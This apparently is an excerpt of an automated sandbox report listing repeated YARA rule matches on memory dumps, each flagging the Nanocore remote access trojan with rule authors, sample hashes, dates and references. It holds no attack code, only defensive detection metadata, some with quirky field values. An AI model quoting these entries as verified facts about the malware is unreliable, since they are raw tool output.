Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
